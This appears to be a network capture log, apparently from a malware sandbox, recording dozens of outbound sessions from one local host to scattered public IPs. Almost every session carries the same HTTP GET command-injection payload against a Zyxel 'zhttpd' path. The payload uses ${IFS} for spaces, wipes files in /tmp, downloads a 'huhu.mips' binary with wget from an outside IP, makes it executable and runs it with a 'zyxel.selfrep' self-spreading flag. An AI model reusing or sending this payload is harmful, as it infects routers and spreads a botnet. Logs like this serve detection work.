                                                      Feb 2, 2024 06:36:05.907810926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7454192.168.2.1456146165.11.235.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907860041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7455192.168.2.1432992174.211.251.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907888889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7456192.168.2.1443070206.154.25.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907942057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7457192.168.2.1446304145.232.14.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.907984972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7458192.168.2.1449804123.222.145.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908024073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7459192.168.2.143305412.211.183.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908056021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7460192.168.2.1450094168.206.11.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908102989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7461192.168.2.143951642.168.25.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908135891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7462192.168.2.1435010106.191.47.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908165932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7463192.168.2.1439954141.248.227.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908236027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7464192.168.2.145363488.61.97.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908273935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7465192.168.2.1448702168.105.198.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908323050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7466192.168.2.1452480108.116.81.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908348083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7467192.168.2.145761072.84.199.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908406973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7468192.168.2.1459718145.229.14.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908432007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7469192.168.2.144277061.28.142.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908476114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7470192.168.2.144957665.226.249.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908502102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7471192.168.2.145912699.83.91.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908550978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7472192.168.2.14599681.213.128.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908566952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7473192.168.2.1446710204.193.50.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908638954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7474192.168.2.144208074.128.123.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908674002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7475192.168.2.145672819.161.183.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908714056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7476192.168.2.1441916141.65.126.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908746004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7477192.168.2.1455152188.116.249.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908795118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7478192.168.2.1436572165.135.228.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908837080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7479192.168.2.143407051.52.90.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908874989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7480192.168.2.145009482.71.37.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908906937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7481192.168.2.1437400128.178.30.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908935070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7482192.168.2.1446458101.31.107.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908956051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7483192.168.2.144971012.159.39.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.908989906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7484192.168.2.144959868.122.222.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909045935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7485192.168.2.1458736137.211.91.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909086943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7486192.168.2.1460652153.115.235.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909127951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7487192.168.2.1458058141.231.97.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909164906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7488192.168.2.1456972135.117.181.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909198046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7489192.168.2.1459062149.222.178.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909235001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7490192.168.2.144545442.186.152.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909423113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7491192.168.2.1454704172.41.126.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909450054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7492192.168.2.1444628121.94.214.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909483910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7493192.168.2.145035819.210.54.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909523964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7494192.168.2.145366895.101.108.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909595013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7495192.168.2.1445136139.212.33.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909627914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7496192.168.2.1449018164.19.216.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909658909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7497192.168.2.1436564133.50.98.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909703016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7498192.168.2.143917844.48.160.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909763098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7499192.168.2.145586412.117.37.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909763098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7500192.168.2.145604037.225.195.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909801006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7501192.168.2.1450618116.199.83.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909853935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7502192.168.2.1459900159.105.17.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909900904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7503192.168.2.146070253.138.246.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909929037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7504192.168.2.1437570130.237.175.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.909961939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7505192.168.2.1454540102.8.165.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910021067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7506192.168.2.144409434.171.1.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910073042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7507192.168.2.14495724.50.179.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910116911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7508192.168.2.1443832200.55.92.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910145998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7509192.168.2.144281262.98.40.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910202980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7510192.168.2.1437464112.108.131.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910229921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7511192.168.2.1433616182.29.242.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910275936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7512192.168.2.145578027.63.88.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910324097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7513192.168.2.1441668200.200.6.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910372972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7514192.168.2.144491263.179.47.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910408020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7515192.168.2.144022288.47.90.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910475969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7516192.168.2.1449198191.224.130.150443
                                                      TimestampBytes transferredDirectionData
